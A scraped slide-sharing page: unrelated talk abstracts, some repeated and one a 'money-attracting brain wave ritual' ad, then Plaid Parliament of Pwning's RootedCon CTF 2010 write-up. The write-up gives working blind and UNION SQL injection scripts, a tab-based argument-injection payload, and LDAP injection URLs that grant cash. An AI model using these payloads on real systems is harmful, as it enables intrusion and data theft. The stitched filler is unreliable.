This document summarizes the solutions to 7 challenges from the RootedCon CTF 2010 competition by the Plaid Parliament of Pwning security group. The challenges involved gaining administrator access, exploiting login forms, reading fortune files, following links to files, using SQL injections to view data, making an online purchase, and decrypting packed JavaScript. The solutions used techniques like cookie manipulation, file backups, SQL injections, LDAP injections, and JavaScript unpacking.
Inside a Digital Collection: Historic Clothing in OmekaArden Kirkland
In July of 2014, I was invited to present a guest lecture for Foundations of Digital Data (IST676) at the Syracuse University School of Information Studies, taught by Angela U. Ramnarine-Rieks. This talk provides an inside look at creating a digital collection. As this was an online, asynchronous class, I recorded my presentation as a YouTube video, which you can see at http://youtu.be/vYTggDBqBgQ. It includes some discussion of the technical underpinnings of the Omeka site I've created for Vassar's collection of historic clothing, including slides that show my customizations in PHP for showing related items.
With this presentation I hope to show that using SPL doesn't require a PHD and that it really benefits your application design, maintainability and implements best practices to solve common development problems.
Inside a Digital Collection: Historic Clothing in OmekaArden Kirkland
In July of 2014, I was invited to present a guest lecture for Foundations of Digital Data (IST676) at the Syracuse University School of Information Studies, taught by Angela U. Ramnarine-Rieks. This talk provides an inside look at creating a digital collection. As this was an online, asynchronous class, I recorded my presentation as a YouTube video, which you can see at http://youtu.be/vYTggDBqBgQ. It includes some discussion of the technical underpinnings of the Omeka site I've created for Vassar's collection of historic clothing, including slides that show my customizations in PHP for showing related items.
With this presentation I hope to show that using SPL doesn't require a PHD and that it really benefits your application design, maintainability and implements best practices to solve common development problems.
Full-day tutorial for the dutch php conference 2011 giving a very quick tour around all the various areas of the ZCE syllabus and some tips on the exam styles
How I Built a Power Debugger Out of the Standard Library and Things I Found o...doughellmann
Smiley demonstrates how to use Python's native tracing capabilities to monitor not just what parts of your program run, but the data flowing through the program as it runs. All of the data is recorded for study after the program exits, which means you can pass different inputs and then compare the results of the runs. In this presentation, I describe the evolution of Smiley, from concept through internal API changes as I worked on the implementation. I also talk about tracing Python programs in general, and explain how the trace code in Smiley can be used to send trace data to different output destinations.
Practical JavaScript Programming - Session 6/8Wilson Su
JavaScript is one of the most popular skills in today’s job market. It allows you to create both client- and server-side applications quickly and easily. Having a solid understanding of this powerful and versatile language is essential to anyone who uses it.
“Practical JavaScript Programming” does not only focus on best practices, but also introduces the fundamental concepts. This course will take you from JavaScript basics to advanced. You’ll learn about topics like Data Types, Functions, Events, AJAX and more.
[PL] Jak nie zostać "programistą" PHP?Radek Benkel
Po sieci krąży wiele opinii, jak to programiści PHP nie są prawdziwymi programistami i że PHP to w ogóle nie jest język programowania, etc.
A winni takiego stanu rzeczy są sami programiści bądź właśnie „programiści”. Dlaczego? W każdym języku da się napisać kod zły jak i dobry. A w świecie PHP niestety dużo jest tego złego – choć trend ten zmienia się na lepsze.
Celem wykładu jest zapoznanie uczestników z rzeczami, na które należy zwrócić uwagę podczas tworzenia aplikacji w języku PHP. Druga (krótsza) część prezentacji będzie poświęcona ogólnym dobrym praktykom programistycznym, nie związanym z żadnym konkretnym językiem.
One of the most time consuming tasks as a red teamer is diving into filesystems and shares, attempting to identify any potentially sensitive information. Genneraly users store credentials and other sensitive information in local filesystems and this talk has the purpose of explaining how to use the carnivorall as a means to speed up the task of searching important files using several vectors. I will present some proof of concepts, comparisons between tools and my recent success cases in red teaming engagements."
Backdooring the web is the cheapest and most hidden way to achieve
persistence on a compromised network, both if you're looking at
privileges on the webapp itself or at executing command to underlying
system.
During the talk, we will discuss the context of a web backdoor: the
environment where she can born and grow up will be defined.
Each environmental aspect will be thoroughly analyzed: where is the best
point of injection, why we choose a specific function or trick, what
permissions are needed, how to trigger the backdoor in a safe, hidden
and reproducible way, and of course what to inject.
The talk will thus present several ways to inject obfuscated and hard to
spot vulnerabilities in PHP code. Shown examples will backdoor CMS
plugins as well as custom code, altering the code and polluting the
webapp ecosystem (read: DBMS and webservers).
This talk was give for Elixir Montreal Meetup to talk about how the elixir formatter works and how it compiles the source code to generate a pretty format
Even nowadays, PHP code is mostly manually audited. Expert pore over actual code, in search for bugs or code smells. Actually, it is possible to have PHP do this work itself ! Strengthened with the internal Tokenizer, bolstered by the manual, it is able to scan thousands of lines of code, without getting bored, and bringing pragmatic pieces of wisdom: official manual recommendations, version migration, code pruning and security. In the end, it deliver a global overview of the code, without reading it.
Banking malware zeu s zombies are using in online banking theft.Nahidul Kibria
Video: https://www.youtube.com/watch?v=VE-w-AsfcGk
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in “securITy” Information Security Conference at BASIS SoftExpo 2014,Digital world 2014
Full-day tutorial for the dutch php conference 2011 giving a very quick tour around all the various areas of the ZCE syllabus and some tips on the exam styles
How I Built a Power Debugger Out of the Standard Library and Things I Found o...doughellmann
Smiley demonstrates how to use Python's native tracing capabilities to monitor not just what parts of your program run, but the data flowing through the program as it runs. All of the data is recorded for study after the program exits, which means you can pass different inputs and then compare the results of the runs. In this presentation, I describe the evolution of Smiley, from concept through internal API changes as I worked on the implementation. I also talk about tracing Python programs in general, and explain how the trace code in Smiley can be used to send trace data to different output destinations.
Practical JavaScript Programming - Session 6/8Wilson Su
JavaScript is one of the most popular skills in today’s job market. It allows you to create both client- and server-side applications quickly and easily. Having a solid understanding of this powerful and versatile language is essential to anyone who uses it.
“Practical JavaScript Programming” does not only focus on best practices, but also introduces the fundamental concepts. This course will take you from JavaScript basics to advanced. You’ll learn about topics like Data Types, Functions, Events, AJAX and more.
[PL] Jak nie zostać "programistą" PHP?Radek Benkel
Po sieci krąży wiele opinii, jak to programiści PHP nie są prawdziwymi programistami i że PHP to w ogóle nie jest język programowania, etc.
A winni takiego stanu rzeczy są sami programiści bądź właśnie „programiści”. Dlaczego? W każdym języku da się napisać kod zły jak i dobry. A w świecie PHP niestety dużo jest tego złego – choć trend ten zmienia się na lepsze.
Celem wykładu jest zapoznanie uczestników z rzeczami, na które należy zwrócić uwagę podczas tworzenia aplikacji w języku PHP. Druga (krótsza) część prezentacji będzie poświęcona ogólnym dobrym praktykom programistycznym, nie związanym z żadnym konkretnym językiem.
One of the most time consuming tasks as a red teamer is diving into filesystems and shares, attempting to identify any potentially sensitive information. Genneraly users store credentials and other sensitive information in local filesystems and this talk has the purpose of explaining how to use the carnivorall as a means to speed up the task of searching important files using several vectors. I will present some proof of concepts, comparisons between tools and my recent success cases in red teaming engagements."
Backdooring the web is the cheapest and most hidden way to achieve
persistence on a compromised network, both if you're looking at
privileges on the webapp itself or at executing command to underlying
system.
During the talk, we will discuss the context of a web backdoor: the
environment where she can born and grow up will be defined.
Each environmental aspect will be thoroughly analyzed: where is the best
point of injection, why we choose a specific function or trick, what
permissions are needed, how to trigger the backdoor in a safe, hidden
and reproducible way, and of course what to inject.
The talk will thus present several ways to inject obfuscated and hard to
spot vulnerabilities in PHP code. Shown examples will backdoor CMS
plugins as well as custom code, altering the code and polluting the
webapp ecosystem (read: DBMS and webservers).
This talk was give for Elixir Montreal Meetup to talk about how the elixir formatter works and how it compiles the source code to generate a pretty format
Even nowadays, PHP code is mostly manually audited. Expert pore over actual code, in search for bugs or code smells. Actually, it is possible to have PHP do this work itself ! Strengthened with the internal Tokenizer, bolstered by the manual, it is able to scan thousands of lines of code, without getting bored, and bringing pragmatic pieces of wisdom: official manual recommendations, version migration, code pruning and security. In the end, it deliver a global overview of the code, without reading it.
Banking malware zeu s zombies are using in online banking theft.Nahidul Kibria
Video: https://www.youtube.com/watch?v=VE-w-AsfcGk
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in “securITy” Information Security Conference at BASIS SoftExpo 2014,Digital world 2014
DC612 Day - Web Application Security: OWASP Top 10dc612
Title: Web Application Security: OWASP Top 10 by Brian Johnson
Abstract: In this session we will learn how to find, demonstrate how to exploit and discuss how to prevent the OWASP Top 10 Security Issues. We will also discuss how these issues are exploited in the real world. Students will have the opportunity to have hands on experience testing for and exploiting these issues.
Requirements: All attendees interested in participating in the labs will need to bring their own laptop. Laptops should have a wired Ethernet port in order to participate in labs.
Asynchronous operations are getting more and more popular. To the point that we are getting frameworks and environments revolving strictly around that concept. Boost.ASIO, Twisted and node.js are notable example. We will not explore that area. We will focus on techniques for making asynchronous more readable. We will present different currently used solutions. At the end we will introduce coroutines and explain the concept. We will show how these can be integrated with asynchronous code and what we benefit from using coroutines in asynchronous code.
Gary Bernhardt’s famous WAT talk pokes fun at the weird things in Ruby and JavaScript due to weak typing and operator overloading. But Go can be strange, too. It has its own odd behaviors, some of which we run into every day. Learning about Go’s corner cases teaches us how Go works under the covers.
Being functional in PHP (PHPDay Italy 2016)David de Boer
Functional programming, though far from new, has gained much traction recently. Functional programming characteristics have started to appear in the PHP world, too. Microframeworks such as Silex and Slim, middleware architectures such as Stack and even standards such as PSR-7 rely on concepts such as lambdas, referential transparency and immutability, all of which come from functional programming. I’ll give you a crash course in Erlang, a pragmatic functional language to make you feel familiar with the functional paradigm. By comparing code samples between Erlang and PHP, you’ll find out how you can employ functional programming in your PHP applications where appropriate. You’ll see that functional programming is nothing to be scared of. On the contrary, understanding its concepts broadens your programming horizon and provides you with valuable solutions to your problems.
TYPO3 Extension development using new Extbase frameworkChristian Trabold
My presentation for the TYPO3 community day in Tokyo, Japan.
The code is available at https://github.com/ctrabold/t3ski-workshop.
Due to copyright issues I had to remove all pictures of Miffy.
Finding and fixing bugs is a major chunk of any developers time. This talk describes the basic rules for effective debugging in any language, but shows how the tools available in PHP can be used to find and fix even the most elusive error
ER(Entity Relationship) Diagram for online shopping - TAEHimani415946
https://bit.ly/3KACoyV
The ER diagram for the project is the foundation for the building of the database of the project. The properties, datatypes, and attributes are defined by the ER diagram.
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesSanjeev Rampal
Talk presented at Kubernetes Community Day, New York, May 2024.
Technical summary of Multi-Cluster Kubernetes Networking architectures with focus on 4 key topics.
1) Key patterns for Multi-cluster architectures
2) Architectural comparison of several OSS/ CNCF projects to address these patterns
3) Evolution trends for the APIs of these projects
4) Some design recommendations & guidelines for adopting/ deploying these solutions.
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
This 7-second Brain Wave Ritual Attracts Money To You.!nirahealhty
Discover the power of a simple 7-second brain wave ritual that can attract wealth and abundance into your life. By tapping into specific brain frequencies, this technique helps you manifest financial success effortlessly. Ready to transform your financial future? Try this powerful ritual and start attracting money today!
This 7-second Brain Wave Ritual Attracts Money To You.!
Rooted 2010 ppp
1. RootedCon CTF 2010
Plaid Parliament of Pwning - Security Research Group at CMU
October 11, 2010
1 Introduction
This is a write-up for RootedCon CTF 2010 from Plaid Parliament of Pwning (PPP), Carnegie
Mellon University’s Security Research Group. This write-up describes walk-throughs for all the
challenges that we have completed during the competition. This report file will also be available
at http://ppp.cylab.cmu.edu.
2 Walk-throughs
Problem 1:getadmin
This page appears to be just a normal page with no normal vulnerabilities. After staring at it
for a while, we try to see if there are other files on the webserver that may give us some information.
We soon stumble across the page index.php∼, this is a backup file created automatically when,
for example, one edits a file in emacs. Reading this source code, we see that when the correct
password is sent, the value is administrator gets set to 1. Further, as this php page emulates
the actions of register globals, we can try to set this value ourselves. We can see that using post or
get requests with the value are specifically filtered, but cookies are not. Set our cookie to contain
the value is administrator=1, and then try submitting the form.
Flag: t00easy f0r 31337 l1k3 y0u
Problem 2:damn login
It shows our browser name, so the theory is that it is looking this up in a database. If we throw
a single-quote in the user-agent, we cause it to output nothing. It is then trivial, to implement a
blind SQL attack. See below for our python script.
Flag: Us3r4g3nt l34k3d s0 much 1nf0
Script:
1 #!/ usr/bin/python
import string
3 import urllib2
5 target = ’user ()’
test = []
7 search_space = list(string.lowercase) + list(string.uppercase) + [’@’, ’_’, ’0’,
’1’, ’2’, ’3’, ’4’, ’5’, ’6’, ’7’, ’8’, ’9’]
1
2. 9 def runtest(req , ua):
req.add_header(’User -Agent ’, ua % (’’.join(test)))
11 return ’Internet Explorer ’ in urllib2.urlopen(req).read ()
13 #ua = "1’,( select /**/ count(TABLE_NAME)/**/ from /**/ information_schema .tables /**/
where /**/( TABLE_SCHEMA /**/ like /**/’ damn_login ’)*( TABLE_NAME /**/ like /**/ ’%s’)
like ’1’));#"
#ua = "1’,( select /**/ count(TABLE_NAME)/**/ from /**/ information_schema .columns /**/
where /**/( TABLE_NAME /**/ like /**/’ secretpass ’)*( COLUMN_NAME /**/ like /**/ ’%s’)like
’1’));#"
15 ua = "1’,( select /**/ count(pwd)/**/ from /**/ SecretPass /**/ where /**/ binary(pwd)/**/
like /**/ ’%s’));#"
17 req = urllib2.Request(’http :// ctf.rs -labs.com :85/
damn_login_82c5feb95ba26418a402506311c99c7a /’, ’pass=test ’)
19 # get length
21 length = 0
while True:
23 print ’Trying: %s’ % ’’.join(test)
if runtest(req , ua):
25 length = len(test)
break
27 test.append(’_’)
29 for i in xrange(length):
done = False
31 for j in search_space:
test[i] = j
33 print ’Trying: %s’ % ’’.join(test)
if runtest(req , ua):
35 done = True
break
37 if not done:
print ’Stopped at ’ + ’’.join(test)
39 break
Problem 3:fortune
We can see that this webpage simply runs the unix program fortune with whichever arguments
are given as the fortune parameter. Many of the special characters that we would want to use to
either run arbitrary commands or pass more than one parameter at a time to the fortune program
are specifically blocked, giving the error message “Hacking attempt! (non-allowed chars)”.
However, after trying many characters, we learn that the tab character (value 0x09) is allowed!
This let’s us pass multiple arguments to the fortune program. We submit fortune=-f%09fortunes%2F
(where fortunes/ is the folder containing our fortune files) to get a listing of all the files in this
folder. The file named key-8b2f0453df4597c4e3cd92215bd2000e immediately sticks out, so we
view it by sending fortune=fortunes%2Fkey-8b2f0453df4597c4e3cd92215bd2000e.
Flag: Y0u 4r3 m0re lucky th4n y0u th0ught
2
3. Problem 4:oneweb
This problems tells us to read 0fdd8fd4233f8a226ff5a4fe87eee080.html for more instruc-
tions. Sadly, upon going there, we see another site that tells us to now go to 415b4dd20fbf84f57ecd9067d46cfd25.
Quickly we realize that we are going to need to repeat this process quite a few times, so we quickly
create a script using perl.
#!/ usr/bin/perl
2 $result = " dc001aeff6413933fa39ce2274c4e7f1 .html ";
4 while ($result =~ m/(w+. html)/) {
$result = ‘curl http :// ctf.rs -labs.com :84/
oneweb_e04932f0613ba8c4ecadb225d929fd13 /$1 2>/dev/null ‘;
6 }
print $result;
Flag: t00 t1r3d f0r th1S 0N3
Problem 5:weblist We see a list of animals and numbers. If we type in one of the numbers,
we get the corresponding animal. We can seperate multiple numbers using a space.
This is probably be implemented by replacing a space with a comma and the number is sur-
rounded by double-quotes, and then throwing into a sql query of the form: ’select id, name from
table where id in (...)’.
Using this we can start with a blind sql attack to get the schema. Once we have the schema,
we can use a union query to get the rest of the information.
Flag: cH4nG3d t0 fUcK k4cH4K1l
Unions:
1 2") union(select(TABLE_NAME) ,(COLUMN_NAME) ,(1) from( information_schema .columns))
union /**/ select(wl.id) ,(wld.list_id) ,(3) from (( select(id)from(WebList))wl ,(
select(list_id)from(WebListDescr))wld)having ("a
3 2") union(select( login_3e1ce4bce9a68db1a1c576d1f76e5aa6 ) ,(
password_3e1ce4bce9a666b1a1c576d1f76e5aa6 ) ,(1) from(
UserPassword_55cf9c78f77986669bc362385cb55f97 ))union /**/ select(wl.id) ,(wld.
list_id) ,(3) from (( select(id)from(WebList))wl ,( select(list_id)from(WebListDescr)
)wld)having ("a
Blind SQL:
1 #!/ usr/bin/perl
3 foobar ("");
#foobar ("");
5
sub foobar {
7
my $prefix = pop(@_);
9
my $i = length($prefix)+1;
11
for my $s (32..122) {
13 $s = chr($s);
if($s eq ".") {
3
4. 15 next;
}
17 if($i > 4) {
next;
19 }
21 ($string = $prefix.$s) =~ s/(.)/sprintf ("%x",ord($1))/eg;
my $result = ‘curl "http :// ctf.rs -labs.com :83/
weblist_85baaaf3d4593fcbaeb3878c0357cfd4 /? list =2" , exists(select(
concat_ws ("." , TABLE_NAME ,COLUMN_NAME))a/**/ from( information_schema .
columns)having(field(binary(substring(a,1,$i)) ,0x$string))) ,"2" 2>/dev/
null ‘;
23 # my $result = ‘curl "http :// ctf.rs -labs.com :83/
weblist_85baaaf3d4593fcbaeb3878c0357cfd4 /? list =2" , exists(select(concat_ws
("." , password))a/**/ from(UserPassword)having(field(binary(substring(a,1,
$i)) ,0x$string))) ,"2" 2>/dev/null ‘;
25 if ($result =~ m/perro/ig && $i < 20) {
print "n*** $prefix$sn";
27 foobar($prefix.$s);
}
29 }
}
Problem 6:shop
The goal of this problem was to buy an expensive item that would give you the key.
After registering and logging on, we notice that we can see, search, and buy products. We also
notice that we start with 100 cash and there is no way to increase our cash.
When we click ”SEE PRODUCTS” (expensive) we notice that there is a ’>=36’ in the url. By
changing this to ‘<=0’, we can see all of the products.
This gives us the first hint: “If I were you, I’d try to activate DEBUG mode”.
So, if we append ‘&debug=1’ to the URL, we see the raw output of the query. This also tells us
that it is an LDAP injection problem. Now, we try to get all of the objects in the LDAP directory,
not just products. To do this requires us to negate the requirement: ’ctfPrice <= ...’. Luckily for
us, using the search feature, we can inject text both before and after that requirement. This allows
us to negate it. The url would look something like:
http :// ctf.rs -labs.com :82/ shop_c8f828cc0374f4b1e2187599055ecde2 /?op=busqueda&
nombre =*%29%28!%28|%28 ctfPrice %3d1&tipo =%3E%3D36 %29%29& Submit=FIND&debug =1
And now, we get the second hint:
You nearly got it. Only one step is missing... Look for ways to increase your cash. Tip3: I am
calling ldapadd cmd util from code
So, this gives the format of user objects. Since ldapadd treats newlines as delimiters for at-
tributes, if we put a newline followed by ’ctfCash: 31337’ we will have enough money to buy the
item.
For example:
1 http :// ctf.rs -labs.com :82/ shop_c8f828cc0374f4b1e2187599055ecde2 /?op=registro&subop
=procesar&username=ppp3&clearpassword=ppp3&nombrecompleto =1%0 ActfCash :%2031337&
tlf=ppp2&Submit=Send
4
5. Now, we buy the item and we get the key:
Flag: LD4p 1nj3ct10N rlZzzz
Problem 7:scriptures
Viewing the source of this page we see a horrible mess of packed javascript. Luckily we recognize
this as packed with the popular javascript compressor found at http://dean.edwards.name/packer/,
which also handles unpacking (we leave enabling the decode button as an exercise for the reader).
Rather than trying to reverse the javascript, we can observe that the cp function does the actual
comparison for the password, so we modify it from comparing strings to simply displaying an alert
box with the string to which our input is compared. We enter the modified function
1 javascript:function cp(tspaQc3) {var DZr4 = "x6ex6bx75x33x69x75x6ex32x78
x75x32x7a";var d5 = ""; for (i = 0; i < DZr4 [" x6cx65x6ex67x74x68 "]; i++)
{d5 += window [" x53x74x72x69x6ex67 "][" x66x72x6fx6dx43x68x61x72
x43x6fx64x65 "](( DZr4 [" x63x68x61x72x43x6fx64x65x41x74 "](i) - (5 * i
) % 3) % 256)}alert (r(d5));};cp();
in the address bar, to automagically print out our key.
Flag: y0uw0ntg3tin
3 Acknowledgement
As always we thank Professor David Brumley for the guidance and the support.
5